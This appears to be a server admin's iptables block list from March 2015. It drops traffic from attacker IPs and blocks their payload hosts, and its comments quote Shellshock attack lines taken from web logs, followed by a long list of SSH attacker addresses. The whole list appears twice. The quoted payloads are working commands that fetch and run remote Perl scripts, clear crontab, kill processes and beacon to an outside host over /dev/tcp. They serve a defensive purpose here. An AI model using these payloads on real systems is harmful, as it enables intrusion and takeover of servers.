donnykurnia/iptables-block-list-2015-03-08

## iptables-block-list-2015-03-08
# shellshock exploit
# 209.236.133.201 - - [02/Mar/2015:15:50:03 +0700] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22cd /var/tmp ; wget http://151.236.44.210/ft.exe ; curl -O http://151.236.44.210/ft.exe;perl ft.exe;perl /var/tmp/ft.exe;perl ft.exe\x22"
iptables -I INPUT -s 209.236.133.201 -j DROP
iptables -A OUTPUT -d 151.236.44.210 -j DROP

# 31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /fcgi-php/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'"
iptables -I INPUT -s 31.184.194.114  -j DROP
iptables -A OUTPUT -d 64.32.12.152   -j DROP

# 50.22.0.250 - - [25/Feb/2015:21:45:24 +0000] "GET HTTP/1.1 HTTP/1.1" 400 418 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://87.106.130.7/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://87.106.130.7/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
iptables -I INPUT -s 50.22.0.250     -j DROP
iptables -A OUTPUT -d 87.106.130.7   -j DROP

# 68.116.30.102 - - [27/Feb/2015:08:11:45 +0700] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22" "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22"
iptables -I INPUT -s 68.116.30.102   -j DROP
iptables -A OUTPUT -d 23.227.199.185 -j DROP

# 186.211.96.170 - - [23/Feb/2015:22:25:23 +0700] "GET / HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22"
# 216.245.134.238 - - [26/Feb/2015:18:33:15 +0700] "GET / HTTP/1.0" 301 101 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22"
iptables -I INPUT -s 186.211.96.170   -j DROP
iptables -I INPUT -s 216.245.134.238  -j DROP

# ssh attacker
iptables -I INPUT -s 14.63.161.216    -j DROP
iptables -I INPUT -s 49.213.16.131    -j DROP
iptables -I INPUT -s 49.236.204.180   -j DROP
iptables -I INPUT -s 54.235.163.229   -j DROP
iptables -I INPUT -s 58.42.252.116    -j DROP
iptables -I INPUT -s 58.64.3.29       -j DROP
iptables -I INPUT -s 58.145.168.162   -j DROP
iptables -I INPUT -s 61.160.215.102   -j DROP
iptables -I INPUT -s 61.160.247.14    -j DROP
iptables -I INPUT -s 62.210.141.204   -j DROP
iptables -I INPUT -s 64.150.187.95    -j DROP
iptables -I INPUT -s 65.207.23.201    -j DROP
iptables -I INPUT -s 82.165.151.97    -j DROP
iptables -I INPUT -s 82.194.76.182    -j DROP
iptables -I INPUT -s 87.106.151.126   -j DROP
iptables -I INPUT -s 88.156.77.176    -j DROP
iptables -I INPUT -s 91.240.163.39    -j DROP
iptables -I INPUT -s 95.70.201.28     -j DROP
iptables -I INPUT -s 95.77.16.45      -j DROP
iptables -I INPUT -s 103.41.124.0/24  -j DROP
iptables -I INPUT -s 104.130.166.23   -j DROP
iptables -I INPUT -s 104.167.104.147  -j DROP
iptables -I INPUT -s 104.207.144.209  -j DROP
iptables -I INPUT -s 107.182.140.36   -j DROP
iptables -I INPUT -s 108.229.25.10    -j DROP
iptables -I INPUT -s 109.166.212.230  -j DROP
iptables -I INPUT -s 109.169.74.58    -j DROP
iptables -I INPUT -s 111.74.239.39    -j DROP
iptables -I INPUT -s 112.217.177.82   -j DROP
iptables -I INPUT -s 112.220.204.42   -j DROP
iptables -I INPUT -s 113.195.145.0/24 -j DROP
iptables -I INPUT -s 115.230.126.151  -j DROP
iptables -I INPUT -s 115.231.218.130  -j DROP
iptables -I INPUT -s 115.231.218.131  -j DROP
iptables -I INPUT -s 115.231.222.45   -j DROP
iptables -I INPUT -s 115.231.222.176  -j DROP
iptables -I INPUT -s 115.239.228.0/24 -j DROP
iptables -I INPUT -s 121.61.19.0/24   -j DROP
iptables -I INPUT -s 151.249.136.71   -j DROP
iptables -I INPUT -s 173.193.162.83   -j DROP
iptables -I INPUT -s 182.100.67.113   -j DROP
iptables -I INPUT -s 182.100.67.115   -j DROP
iptables -I INPUT -s 183.136.216.0/24 -j DROP
iptables -I INPUT -s 198.12.149.20    -j DROP
iptables -I INPUT -s 198.199.70.171   -j DROP
iptables -I INPUT -s 200.29.21.26     -j DROP
iptables -I INPUT -s 200.106.151.126  -j DROP
iptables -I INPUT -s 200.222.72.170   -j DROP
iptables -I INPUT -s 202.121.199.171  -j DROP
iptables -I INPUT -s 202.123.179.226  -j DROP
iptables -I INPUT -s 218.28.103.231   -j DROP
iptables -I INPUT -s 218.87.111.108   -j DROP
iptables -I INPUT -s 218.87.111.110   -j DROP
iptables -I INPUT -s 218.106.254.121  -j DROP
iptables -I INPUT -s 221.203.3.0/24   -j DROP
iptables -I INPUT -s 221.224.10.50    -j DROP
iptables -I INPUT -s 221.226.106.188  -j DROP
iptables -I INPUT -s 222.101.130.145  -j DROP
iptables -I INPUT -s 222.186.50.164   -j DROP
iptables -I INPUT -s 222.186.56.40    -j DROP
iptables -I INPUT -s 222.186.56.41    -j DROP
iptables -I INPUT -s 222.186.58.70    -j DROP
iptables -I INPUT -s 222.186.197.76   -j DROP
service iptables-persistent save
	# shellshock exploit
	# 209.236.133.201 - - [02/Mar/2015:15:50:03 +0700] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22cd /var/tmp ; wget http://151.236.44.210/ft.exe ; curl -O http://151.236.44.210/ft.exe;perl ft.exe;perl /var/tmp/ft.exe;perl ft.exe\x22"
	iptables -I INPUT -s 209.236.133.201 -j DROP
	iptables -A OUTPUT -d 151.236.44.210 -j DROP

	# 31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /fcgi-php/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'"
	iptables -I INPUT -s 31.184.194.114 -j DROP
	iptables -A OUTPUT -d 64.32.12.152 -j DROP

	# 50.22.0.250 - - [25/Feb/2015:21:45:24 +0000] "GET HTTP/1.1 HTTP/1.1" 400 418 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://87.106.130.7/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://87.106.130.7/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
	iptables -I INPUT -s 50.22.0.250 -j DROP
	iptables -A OUTPUT -d 87.106.130.7 -j DROP

	# 68.116.30.102 - - [27/Feb/2015:08:11:45 +0700] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22" "() { :;}; /bin/bash -c \x22echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/tcp/23.227.199.185/80; echo KABINETKITA.ORG/cgi-bin/test-cgi > /dev/udp/23.227.199.185/80\x22"
	iptables -I INPUT -s 68.116.30.102 -j DROP
	iptables -A OUTPUT -d 23.227.199.185 -j DROP

	# 186.211.96.170 - - [23/Feb/2015:22:25:23 +0700] "GET / HTTP/1.1" 301 178 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3130342e3135332e3230392e3234\x22"
	# 216.245.134.238 - - [26/Feb/2015:18:33:15 +0700] "GET / HTTP/1.0" 301 101 "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22" "() { :;}; /bin/bash -c \x22wget -O /tmp/bbb www.redel.net.br/1.php?id=3132382e3139392e3131362e3533\x22"
	iptables -I INPUT -s 186.211.96.170 -j DROP
	iptables -I INPUT -s 216.245.134.238 -j DROP

	# ssh attacker
	iptables -I INPUT -s 14.63.161.216 -j DROP
	iptables -I INPUT -s 49.213.16.131 -j DROP
	iptables -I INPUT -s 49.236.204.180 -j DROP
	iptables -I INPUT -s 54.235.163.229 -j DROP
	iptables -I INPUT -s 58.42.252.116 -j DROP
	iptables -I INPUT -s 58.64.3.29 -j DROP
	iptables -I INPUT -s 58.145.168.162 -j DROP
	iptables -I INPUT -s 61.160.215.102 -j DROP
	iptables -I INPUT -s 61.160.247.14 -j DROP
	iptables -I INPUT -s 62.210.141.204 -j DROP
	iptables -I INPUT -s 64.150.187.95 -j DROP
	iptables -I INPUT -s 65.207.23.201 -j DROP
	iptables -I INPUT -s 82.165.151.97 -j DROP
	iptables -I INPUT -s 82.194.76.182 -j DROP
	iptables -I INPUT -s 87.106.151.126 -j DROP
	iptables -I INPUT -s 88.156.77.176 -j DROP
	iptables -I INPUT -s 91.240.163.39 -j DROP
	iptables -I INPUT -s 95.70.201.28 -j DROP
	iptables -I INPUT -s 95.77.16.45 -j DROP
	iptables -I INPUT -s 103.41.124.0/24 -j DROP
	iptables -I INPUT -s 104.130.166.23 -j DROP
	iptables -I INPUT -s 104.167.104.147 -j DROP
	iptables -I INPUT -s 104.207.144.209 -j DROP
	iptables -I INPUT -s 107.182.140.36 -j DROP
	iptables -I INPUT -s 108.229.25.10 -j DROP
	iptables -I INPUT -s 109.166.212.230 -j DROP
	iptables -I INPUT -s 109.169.74.58 -j DROP
	iptables -I INPUT -s 111.74.239.39 -j DROP
	iptables -I INPUT -s 112.217.177.82 -j DROP
	iptables -I INPUT -s 112.220.204.42 -j DROP
	iptables -I INPUT -s 113.195.145.0/24 -j DROP
	iptables -I INPUT -s 115.230.126.151 -j DROP
	iptables -I INPUT -s 115.231.218.130 -j DROP
	iptables -I INPUT -s 115.231.218.131 -j DROP
	iptables -I INPUT -s 115.231.222.45 -j DROP
	iptables -I INPUT -s 115.231.222.176 -j DROP
	iptables -I INPUT -s 115.239.228.0/24 -j DROP
	iptables -I INPUT -s 121.61.19.0/24 -j DROP
	iptables -I INPUT -s 151.249.136.71 -j DROP
	iptables -I INPUT -s 173.193.162.83 -j DROP
	iptables -I INPUT -s 182.100.67.113 -j DROP
	iptables -I INPUT -s 182.100.67.115 -j DROP
	iptables -I INPUT -s 183.136.216.0/24 -j DROP
	iptables -I INPUT -s 198.12.149.20 -j DROP
	iptables -I INPUT -s 198.199.70.171 -j DROP
	iptables -I INPUT -s 200.29.21.26 -j DROP
	iptables -I INPUT -s 200.106.151.126 -j DROP
	iptables -I INPUT -s 200.222.72.170 -j DROP
	iptables -I INPUT -s 202.121.199.171 -j DROP
	iptables -I INPUT -s 202.123.179.226 -j DROP
	iptables -I INPUT -s 218.28.103.231 -j DROP
	iptables -I INPUT -s 218.87.111.108 -j DROP
	iptables -I INPUT -s 218.87.111.110 -j DROP
	iptables -I INPUT -s 218.106.254.121 -j DROP
	iptables -I INPUT -s 221.203.3.0/24 -j DROP
	iptables -I INPUT -s 221.224.10.50 -j DROP
	iptables -I INPUT -s 221.226.106.188 -j DROP
	iptables -I INPUT -s 222.101.130.145 -j DROP
	iptables -I INPUT -s 222.186.50.164 -j DROP
	iptables -I INPUT -s 222.186.56.40 -j DROP
	iptables -I INPUT -s 222.186.56.41 -j DROP
	iptables -I INPUT -s 222.186.58.70 -j DROP
	iptables -I INPUT -s 222.186.197.76 -j DROP
	service iptables-persistent save